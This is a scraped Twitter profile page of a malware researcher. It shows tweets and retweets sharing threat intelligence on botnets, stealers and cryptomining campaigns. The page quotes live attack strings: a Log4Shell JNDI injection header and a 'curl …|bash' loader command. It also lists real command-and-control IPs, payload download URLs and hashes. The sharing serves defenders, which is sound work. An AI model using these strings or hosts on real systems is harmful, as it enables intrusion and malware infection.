Toli @tolisec - Twitter Profile

Pinned Tweet

over 4 years ago

IoT Botnet Exploiting #CVE-2021-44228 #log4j User-Agent: ${jndi:ldap://179.43.175.101:1389/o=tomcat} The payload is JavaScript code executed in Java using ScriptEngineManager. IOCs and sample: https://t.co/kvKqdFIaDD

tolisec's tweet photo. IoT Botnet Exploiting #CVE-2021-44228 #log4j

User-Agent: ${jndi:ldap://179.43.175.101:1389/o=tomcat}
The payload is JavaScript code executed in Java using ScriptEngineManager.
IOCs and sample: https://t.co/kvKqdFIaDD https://t.co/mHDWHdokxI

1

108

39

15

0

Toli @tolisec

about 1 year ago

@banthisguy9349 @BlinkzSec @RacWatchin8872 @g0njxa @Gi7w0rm @TuringAlex @byrne_emmy12099 @James_inthe_box @UK_Daniel_Card @RussianPanda9xx @DarkWebInformer @fs0c131y @cyb3rops @RakeshKrish12

0

1

0

149

Toli @tolisec

over 1 year ago

@banthisguy9349 @500mk500 @abuse_ch yeah mirai variant packed with vanilla upx :)

0

3

0

85

Toli @tolisec

almost 2 years ago

@banthisguy9349 @BlinkzSec @RacWatchin8872 suspect c2s: 195.2.81[.]97:7122 35.212.131[.]94:7122 printerconsulting[.]ru https://t.co/3wmes8R0ie

tolisec's tweet photo. @banthisguy9349 @BlinkzSec @RacWatchin8872 suspect c2s:
195.2.81[.]97:7122
35.212.131[.]94:7122
printerconsulting[.]ru
https://t.co/3wmes8R0ie https://t.co/S507Z8GBC8

1

0

179

Who to follow

Squiblydoo

@SquiblydooBlog

Malware Analysis Creator of Debloat, certReport, and https://t.co/hEJGt0jzIq Want to chat? Join the Debloat discord: https://t.co/ZcWIqa6ZA9

Aaron Jornet

@RexorVc0

Threat Researcher at @socradar | Malware Researcher | Threat Hunter | CTI ¦ Former @ElevenPaths @Panda_Security 📖Book: https://t.co/ZmIUPBuNKG

Shadow Chaser Group

@ShadowChasing1

Shadow Chaser Group is a sub-group of the GcowSec team which consists of college students who love it.Shadow Chaser Group focused on APT hunt and analysis

Toli @tolisec

almost 2 years ago

@banthisguy9349 @500mk500 nice catch! VT has it as metasploit implant, C2: 15.206.116.117:8787

0

2

0

19

tolisec retweeted

Fox_threatintel @banthisguy9349

about 2 years ago

#microsoft just released a article related to #NorthKorean #ThreatActors https://t.co/OL5yZTwBD4 Seems to be that this is a active IOC's related to the ransomware group: 192.177.51.248 ccwaterfall[.]com cc: @tolisec @500mk500 @Gi7w0rm @UK_Daniel_Card @tosscoinwitcher

5

38

11

15

5K

Toli @tolisec

about 2 years ago

@Gi7w0rm @banthisguy9349 @500mk500 @abuse_ch @malwaremustdie doesn't seem like Kaiji, reports hostname and id to stager server (pcap in VT https://t.co/v3CxzNk6F4)

1

2

1

0

483

Toli @tolisec

about 2 years ago

@banthisguy9349 potential C2 for [aee499304dd672782f404c1da20436ce162c44cd37f9d256275089fc17b2d7ed] is 147.78.12[.]176

1

0

96

tolisec retweeted

The Shadowserver Foundation @Shadowserver

over 2 years ago

We are proud to have assisted (along with partners) in the US DoJ & FBI-led disruption of the Moobot malware botnet comprised of SOHO routers utilized by APT 28/Fancy Bear: https://t.co/RnswWqlgYo Data on infections shared in Sinkhole HTTP Events report: https://t.co/4O7u3bvyw7

1

15

12

4

3K

tolisec retweeted

☩MalwareMustDie

@malwaremustdie

over 3 years ago

📢 In #FIRSTCTI22, @unixfreaxjp w/ LACERT teams will share the implementation of @FIRSTdotOrg #CTI Curriculum methods into their investigation of targeted #WebSkimming threat as takeaways for #BlueTeam https://t.co/x3RuGQGtlI Register soon, we value your time with good sharing!

1

24

14

1

0

tolisec retweeted

Dave Kennedy

@HackingDave

almost 4 years ago

Follina patch CVE-2022-30190. (msdt.exe) is out. https://t.co/bWTfNHiBxW

3

129

60

12

0

tolisec retweeted

Germán Fernández

@1ZRR4H

about 4 years ago

Están llegando los mineros! 🤖 (CVE-2022-1388) IP atacante: 85.106.114.175 🇹🇷 Payload: curl 202.28.229.174/ldr.sh|bash Muestras: https://t.co/LWi6xDlHrO * Incluye exfiltración de credenciales SSH

1ZRR4H's tweet photo. Están llegando los mineros! 🤖 (CVE-2022-1388)

IP atacante: 85.106.114.175 🇹🇷
Payload: curl 202.28.229.174/ldr.sh|bash

Muestras: https://t.co/LWi6xDlHrO

* Incluye exfiltración de credenciales SSH https://t.co/MveFOj6612

5

27

10

4

0

tolisec retweeted

Eric Capuano - Bsky: @eric.zip @eric_capuano

about 4 years ago

Everybody is familiar with the value of a tool like VirusTotal for malware... Ever wanted a similar tool for analyzing _not_ malware? Check out @echotrailco - solid collection of information & stats about common binaries found on healthy systems. https://t.co/1owpa5ZqrP

7

299

77

107

0

tolisec retweeted

R. @0xrb

about 4 years ago

𝗔𝗰𝘁𝗶𝘃e #Mars #Stealer #Malware spread from CloudLite LLC Russia Threat Actor keep changing urls C2 Domain : http://jsdkca(.)link/518855.php hash: 6e304b4616eb9daa7da76d3c1894d5e62af10fe6dc3d6b2356518dbb1121d6b9 Seems malware infection in maas in this C2

0xrb's tweet photo. 𝗔𝗰𝘁𝗶𝘃e #Mars #Stealer #Malware spread from CloudLite LLC Russia
Threat Actor keep changing urls
C2 Domain : http://jsdkca(.)link/518855.php
hash:
6e304b4616eb9daa7da76d3c1894d5e62af10fe6dc3d6b2356518dbb1121d6b9
Seems malware infection in maas in this C2 https://t.co/xUcnc7mWYs

0

21

8

2

0

tolisec retweeted

VirusTotal @virustotal

about 4 years ago

VirusTotal welcomes @elfdigest to the VT multi-sandbox project! https://t.co/iqHDobEGLB by @karlhiramoto

1

23

13

0

Toli @tolisec

about 4 years ago

@verovaleros Have a speedy recovery!

1

0

tolisec retweeted

R. @0xrb

about 4 years ago

Currently 𝗔𝗰𝘁𝗶𝘃e #Mars #Stealer #Malware spread from CloudLite LLC Russia They are targeting again India, Brazil, Indonesia,Egypt,Vietnam,Pakistan, Philippines,Mexico C2: hxxp://jsdkct(.)link/47747.php Hash: 95b229600f28adfbe56fc09cd8a8ff88baf261329999f681613e5c951907d451

0xrb's tweet photo. Currently 𝗔𝗰𝘁𝗶𝘃e #Mars #Stealer #Malware spread from CloudLite LLC Russia
They are targeting again India, Brazil, Indonesia,Egypt,Vietnam,Pakistan, Philippines,Mexico
C2: hxxp://jsdkct(.)link/47747.php
Hash:
95b229600f28adfbe56fc09cd8a8ff88baf261329999f681613e5c951907d451 https://t.co/6tHKVJ7fLd

1

24

13

0

tolisec retweeted

R. @0xrb

about 4 years ago

Recently deployed #Mars #Stealer #Malware C2: http://62.204.41.180/5xtELSMXvf.php Hash: 4d0b2e81d023a1704d0fb71cf3e689ec43a813c4041e6d0d5503de2732d18f15 e5e16ce47ed80d3b802a9c36f7ae408493d1e491ce83f72f253832b150aeb4bc

0xrb's tweet photo. Recently deployed #Mars #Stealer #Malware
C2: http://62.204.41.180/5xtELSMXvf.php
Hash:
4d0b2e81d023a1704d0fb71cf3e689ec43a813c4041e6d0d5503de2732d18f15
e5e16ce47ed80d3b802a9c36f7ae408493d1e491ce83f72f253832b150aeb4bc https://t.co/fAp6Pqz5Vy

0

7

6

1

0

tolisec retweeted

☩MalwareMustDie

@malwaremustdie

about 4 years ago

Will you be interested to join our #shellcode ADVANCED workshop w/#radare2 to study & RE on how recent threats are using shellcode in their actions aim Win/Mac/Linux OS? This vote will decide workshop planning, your answers matter! cc: @cedoxX @trufae @radareorg #MalwareMustDie

1

54

26

6

0

tolisec retweeted

R. @0xrb

about 4 years ago

Recent Chinese Threat Actor #Winnti panel C2: ip: 204.15.78.131:3220 (TCP) url: us\.\host.skybad\.\top Actual Payload hosted here : http://160.251.42(.)252/xghk.exe hash: c99397d66e49e2def1b17f57cd0c5fb9 #GoldDragon #ZxShell #threatintel cc: @500mk500 (;

$0xrb's tweet photo. Recent Chinese Threat Actor #Winnti panel C2: ip: 204.15.78.131:3220 (TCP) url: us\.\host.skybad\.\top Actual Payload hosted here : http://160.251.42(.)252/xghk.exe hash: c99397d66e49e2def1b17f57cd0c5fb9 #GoldDragon #ZxShell #threatintel cc: @500mk500 (; https://t.co/p6jtlQEugf$

5

77

25

12

0

Toli @tolisec

about 4 years ago

@1ZRR4H @ankit_anubhav @malwrhunterteam @0xrb Another server used in the same campaign: 80.92.204.82 🇩🇪

0

4

1

0

Toli @tolisec

about 4 years ago

Active #Kinsing #cryptomining campaign targeting exposed Docker API IoCs: hxxp://185.231.153.4/d.sh 🇷🇺 scanner/loader: 95.182.120.39 🇷🇺 initial payload: https://t.co/PRQUpGfuEC kinsing bin: https://t.co/SXRoRPf8OO